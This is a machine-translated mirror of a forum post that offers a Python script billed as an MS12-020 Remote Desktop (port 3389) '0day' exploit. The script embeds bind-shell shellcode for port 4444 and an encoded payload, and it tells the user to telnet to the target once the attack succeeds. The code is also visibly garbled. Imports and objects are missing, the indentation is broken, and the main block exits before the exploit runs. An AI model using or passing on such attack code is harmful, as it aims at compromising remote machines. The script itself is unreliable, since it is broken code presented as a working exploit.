Denne artikkelen er en speilartikkel om maskinoversettelse, vennligst klikk her for å hoppe til originalartikkelen.

Architect_Programmer_Code Landbruksnettverket»Arkitekt Programmering Python MS12-020 3389 0day exp Remote Desktop Execution Code python kildekode ...
Utsikt: 12768|Svare: 0

[Kilde] MS12-020 3389 0day exp Remote Desktop Execution Code python kildekode

[Kopier lenke]
Publisert på 01.12.2014 22:09:32 | | |
  1. #!/usr/bin/env python
  2. #############################################################################
  3. #   MS12-020 Exploi
  4. #
  5. #   Uses FreeRDP
  6. #############################################################################

  8. import struct
  9. import sys
  10. from freerdp import rdpRdp
  11. from freerdp import crypto
  12. from freerdp.rdpRdp import  rdpNego

  14. #bind shellcode TCP port 4444
  15. shellcode  = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
  16. shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
  17. shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
  18. shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
  19. shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
  20. shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
  21. shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
  22. shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
  23. shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
  24. shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
  25. shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
  26. shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
  27. shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
  28. shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
  29. shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
  30. shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
  31. shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
  32. shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
  33. shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
  34. shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
  35. shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
  36. shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
  37. shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'

  39. #Payload
  40. payload  = '\x41\x00\x5c\x00'
  41. payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
  42. payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
  43. payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
  44. payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
  45. payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
  46. payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
  47. payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
  48. payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
  49. payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
  50. payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
  51. payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
  52. payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
  53. payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
  54. payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
  55. payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
  56. payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
  57. payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
  58. payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
  59. payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
  60. payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
  61. payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
  62. payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
  63. payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
  64. payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
  65. payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
  66. payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
  67. payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
  68. payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
  69. payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
  70. payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
  71. payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
  72. payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
  73. payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
  74. payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
  75. payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
  76. payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
  77. payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
  78. payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
  79. payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
  80. payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
  81. payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
  82. payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
  83. payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
  84. payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68';

  86. class SRVSVC_Exploit(Thread):
  87.     def __init__(self, target, port=3389):
  88.         super(SRVSVC_Exploit, self).__init__()
  89.         self.__port   = port
  90.         self.target   = target

  92.     def __DCEPacket(self):
  93.         print '[-]Connecting'
  94.         self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
  95.         self.__trans.connect()
  96.         print '[-]connected' % self.target

  98.         # Making teh packet
  99.         self.__stub='\x01\x00\x00\x00'
  100.         self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
  101.         self.__stub+=shellcode
  102.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
  103.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
  104.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
  105.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
  106.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
  107.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
  108.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
  109.         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
  110.         self.__stub+='\x00\x00\x00\x00'
  111.         self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
  112.         self.__stub+=payload
  113.         self.__stub+='\x00\x00\x00\x00'
  114.         self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
  115.         self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
  116.         self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
  117.         self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
  118.         return

  120.     def run(self):
  121.         self.__DCEPacket()
  122.         self.__dce.call(0x1f, self.__stub)
  123.         print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'

  125. if __name__ == '__main__':
  126.               target = sys.argv[1]
  127.               print '\nUsage: %s <target ip> \n' % sys.argv[0]
  128.         sys.exit(-1)

  130. current = SRVSVC_Exploit(target)
  131. current.start()
Kopier koden





Foregående:Få orden på de kraftige PHP-bakdørene
Neste:Rekruttering av campusveiledere

Relaterte innlegg
Ansvarsfraskrivelse:
All programvare, programmeringsmateriell eller artikler publisert av Code Farmer Network er kun for lærings- og forskningsformål; Innholdet ovenfor skal ikke brukes til kommersielle eller ulovlige formål, ellers skal brukerne bære alle konsekvenser. Informasjonen på dette nettstedet kommer fra Internett, og opphavsrettstvister har ingenting med dette nettstedet å gjøre. Du må fullstendig slette innholdet ovenfor fra datamaskinen din innen 24 timer etter nedlasting. Hvis du liker programmet, vennligst støtt ekte programvare, kjøp registrering, og få bedre ekte tjenester. Hvis det foreligger noen krenkelse, vennligst kontakt oss på e-post.
Mail To:help@itsvse.com